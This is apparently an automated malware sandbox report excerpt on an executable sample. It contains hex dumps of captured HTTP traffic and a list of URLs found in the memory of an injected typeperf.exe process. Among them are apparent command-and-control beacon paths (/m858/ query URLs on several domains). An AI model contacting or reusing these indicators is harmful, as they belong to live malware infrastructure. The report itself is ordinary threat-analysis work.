15 79 a6 df 7b fd bb 67 fe 0c b0 70 74 38 b7 fe 8c 5b ee 39 63 23 45 91 b3 91 82 4c 51 f6 87 72 b8 6c 15 64 17 ea 31 54 bb fb 0d 22 72 15 97 a6 f5 fd 61 ad d7 ea 3d ba d7 94 a3 04 92 90 86 0f ea 2e 43 d5 d9 c9 5e bc 1f 03 92 38 5f 08 58 97 b1 ac 96 ce 77 37 ef 6e 0b 21 89 80 10 11 10 e3 c4 0c 02 a6 b7 73 ae 01 93 ee 99 21 d5 76 10 77 e2 68 83 6b 9f ce 90 68 dd 26 62 b6 d3 92 3e 44 07 1d 7f 62 20 6b 73 06 43 4f 49 b2 9f 42 c6 d1 76 3e 83 87 5a b7 df 61 50 75 86 a8 b2 96 29 c0 64 0f 1d 9a fe 20 f1 4b af 55 bb e6 1c 6d a1 2a f5 14 18 77 0c da ce 02 a3 0a d0 da a3 9c a7 f0 91 d5 4b ba 3d 80 27 0a 8e 78 26 08 6f ad f4 6c bf 59 3d 2e ad 1a 79 3d da c6 34 e9 f9 d9 4a 38 fa 02 2b 58 6f e7 a4 2e ae ca d6 00 9d 53 29 5b 1c 57 f4 2e ad d6 eb 7d b3 a5 b9 07 a2 13 54 3e a7 ea 5a 6b a8 f5 1c 92 bd 36 fb 94 68 77 23 20 21 b6 8a d6 6a d7 c2 54 19 d0 06 8f f0 42 f0 a8 54 c9 e0 e1 09 e5 c5 5a 2f 1f 7d 6b 44 05 fb f9 15 31 e4 38 ed 15 74 f1 f1 71 66 b6 73 7d 7f bb f9 a5 57 4d f7 4d 3f 29 6b 31 1c 85 0c 46 64 20 0b 5f 87 3a 2c 5d 6a 92 97 f5 cb da d0 0b de ce cb fe 37 dd 97 b5 8f e8 bd ac 5f 3f 8f 97 35 f7 29 a3 ec 65 1d 89 6b 24 5e d6 08 23 75 b5 28 41 c6 f9 1a 80 30 32 e7 03 ce 39 73 3e 3c 1e 36 e7 c3 97 97 6f 30 e7 1f ed 4e 43 a1 2e 1b 51 d1 b5 85 b4 55 b9 0d bc b7 58 72 f2 65 7d e9 89 cb 38 f4 b2 fe 66 0a b1 76 9b f8 9e 36 8d 95 1f f9 ac 86 2c a4 3e 15 68 9a d2 f9 fa ed dd 51 1e c0 c4 0e 81 36 b0 03 54 9b 04 95 8b 55 09 6f d7 f3 bb dd 85 0e 3b 1a b7 be f1 82 0e 1b ac d2 6d df 0b 85 a3 e6 ec 70 db be 60 b3 d1 93 3c d3 1f ca 58 93 28 1c 77 a6 12 ef ce d7 55 f0 d2 93 fa a5 72 dc 29 35 5d fa b8 ba f6 c9 76 83 3c 28 6a 94 fd ab 55 8d d3 61 8f 5f 52 2f 7d be ae 6e 8e 75 dd c1 d3 29 e5 8e d3 44 c2 44 df c5 96 bc 9e a2 de ee 93 f8 5d 15 d6 61 98 61 45 0b d9 9e a5 a1 8e c6 17 f1 71 b6 3e 09 17 2b 5a e9 ba fe 43 5d ad 63 31 c3 2c 9c 75 6d 46 e9 07 fe aa 5b eb 89 0f c3 20 6f 8e a2 07 65 3d f6 83 fe 2c ad 44 df a2 bb 02 be bc 5c 3c 64 0e 5d b7 b7 db 02 53 e4 03 53 cf d2 08 24 f7 23 3a a0 b0 0d 94 7f 15 50 59 96 0d cf 76 37 b9 4c fe ea 13 45 8e 4b 1d eb 8e 85 34 0a c5 b4 19 94 54 06 54 5f 2c 7a 39 95 b1 57 bc 9c ca aa f2 5e 4e 95 62 d5 cb 49 30 56 be 9c 44 28 a3 d2 d1 10 e8 ce fb 47 e0 be bb e3 c9 1d ea eb cb 4a fe bd ae 87 36 13 a2 10 68 2b 77 b9 7c ff b6 aa f2 bf 6d ef b3 eb
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:55:14 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8Data Raw: 53 01 5d c1 8c 64 a5 b3 07 40 33 70 5c 8f 75 de 7f be aa df 7f 4b 33 ef e3 ff 18 da 48 64 0c 40 00 58 45 9a 4a f7 d6 5b 7d b3 cd d6 72 20 12 94 90 b0 3d 02 6a a1 f9 97 6f 5a 2a 04 77 65 bc 0f 22 63 69 c0 3b 1f 24 b2 b9 0f 77 9f e9 56 fd f9 33 28 cd 00 e4 15 0c 59 05 12 7b a2 17 7d 15 79 a6 df 7b fd bb 67 fe 0c b0 70 74 38 b7 fe 8c 5b ee 39 63 23 45 91 b3 91 82 4c 51 f6 87 72 b8 6c 15 64 17 ea 31 54 bb fb 0d 22 72 15 97 a6 f5 fd 61 ad d7 ea 3d ba d7 94 a3 04 92 90 86 0f ea 2e 43 d5 d9 c9 5e bc 1f 03 92 38 5f 08 58 97 b1 ac 96 ce 77 37 ef 6e 0b 21 89 80 10 11 10 e3 c4 0c 02 a6 b7 73 ae 01 93 ee 99 21 d5 76 10 77 e2 68 83 6b 9f ce 90 68 dd 26 62 b6 d3 92 3e 44 07 1d 7f 62 20 6b 73 06 43 4f 49 b2 9f 42 c6 d1 76 3e 83 87 5a b7 df 61 50 75 86 a8 b2 96 29 c0 64 0f 1d 9a fe 20 f1 4b af 55 bb e6 1c 6d a1 2a f5 14 18 77 0c da ce 02 a3 0a d0 da a3 9c a7 f0 91 d5 4b ba 3d 80 27 0a 8e 78 26 08 6f ad f4 6c bf 59 3d 2e ad 1a 79 3d da c6 34 e9 f9 d9 4a 38 fa 02 2b 58 6f e7 a4 2e ae ca d6 00 9d 53 29 5b 1c 57 f4 2e ad d6 eb 7d b3 a5 b9 07 a2 13 54 3e a7 ea 5a 6b a8 f5 1c 92 bd 36 fb 94 68 77 23 20 21 b6 8a d6 6a d7 c2 54 19 d0 06 8f f0 42 f0 a8 54 c9 e0 e1 09 e5 c5 5a 2f 1f 7d 6b 44 05 fb f9 15 31 e4 38 ed 15 74 f1 f1 71 66 b6 73 7d 7f bb f9 a5 57 4d f7 4d 3f 29 6b 31 1c 85 0c 46 64 20 0b 5f 87 3a 2c 5d 6a 92 97 f5 cb da d0 0b de ce cb fe 37 dd 97 b5 8f e8 bd ac 5f 3f 8f 97 35 f7 29 a3 ec 65 1d 89 6b 24 5e d6 08 23 75 b5 28 41 c6 f9 1a 80 30 32 e7 03 ce 39 73 3e 3c 1e 36 e7 c3 97 97 6f 30 e7 1f ed 4e 43 a1 2e 1b 51 d1 b5 85 b4 55 b9 0d bc b7 58 72 f2 65 7d e9 89 cb 38 f4 b2 fe 66 0a b1 76 9b f8 9e 36 8d 95 1f f9 ac 86 2c a4 3e 15 68 9a d2 f9 fa ed dd 51 1e c0 c4 0e 81 36 b0 03 54 9b 04 95 8b 55 09 6f d7 f3 bb dd 85 0e 3b 1a b7 be f1 82 0e 1b ac d2 6d df 0b 85 a3 e6 ec 70 db be 60 b3 d1 93 3c d3 1f ca 58 93 28 1c 77 a6 12 ef ce d7 55 f0 d2 93 fa a5 72 dc 29 35 5d fa b8 ba f6 c9 76 83 3c 28 6a 94 fd ab 55 8d d3 61 8f 5f 52 2f 7d be ae 6e 8e 75 dd c1 d3 29 e5 8e d3 44 c2 44 df c5 96 bc 9e a2 de ee 93 f8 5d 15 d6 61 98 61 45 0b d9 9e a5 a1 8e c6 17 f1 71 b6 3e 09 17 2b 5a e9 ba fe 43 5d ad 63 31 c3 2c 9c 75 6d 46 e9 07 fe aa 5b eb 89 0f c3 20 6f 8e a2 07 65 3d f6 83 fe 2c ad 44 df a2 bb 02 be bc 5c 3c 64 0e 5d b7 b7 db 02 53 e4 03 53 cf d2 08 24 f7 23 3a a0 b0 0d 94 7f 15 50 59 96 0d cf 76 37 b9 4c fe ea 13 45 8e 4b 1d eb 8e 85 34 0a c5 b4 19 94 54 06 54 5f 2c 7a 39 95 b1 57 bc 9c ca aa f2 5e 4e 95 62 d5 cb 49 30 56 be 9c 44 28 a3 d2 d1 10 e8 ce fb 47 e0 be bb e3 c9 1d ea eb cb 4a fe bd ae 87 36 13 a2 10 68 2b 77 b9 7c ff b6 aa f2 bf 6d ef b3 eb
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:56:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:56:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:56:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:56:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: typeperf.exe, 0000000B.00000002.3736723872.00000000049AA000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003FEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://blessingstation.org/m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3Qs
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004818000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003E58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000003B88000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.00000000031C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hillcresthealth.online/?ts=fE1vYmlsZUNsZWFuQmxhY2t8fDQ3OWMwfGJ1Y2tldDAwM3x8fHx8fDY1NzFkY2YzYT
            Source: typeperf.exe, 0000000B.00000002.3736723872.00000000044F4000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003B34000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004818000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003E58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: BMhDm7YW62.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: BMhDm7YW62.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000003D1A000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000335A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://porousworld.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6j
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004362000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.00000000039A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJ
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3738071578.0000000005023000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.633922.com
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3738071578.0000000005023000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.633922.com/m858/
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: typeperf.exe, 0000000B.00000003.1607031484.00000000075F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.lets-room.online&rand=
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rytrk.com
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rytrk.com/track.
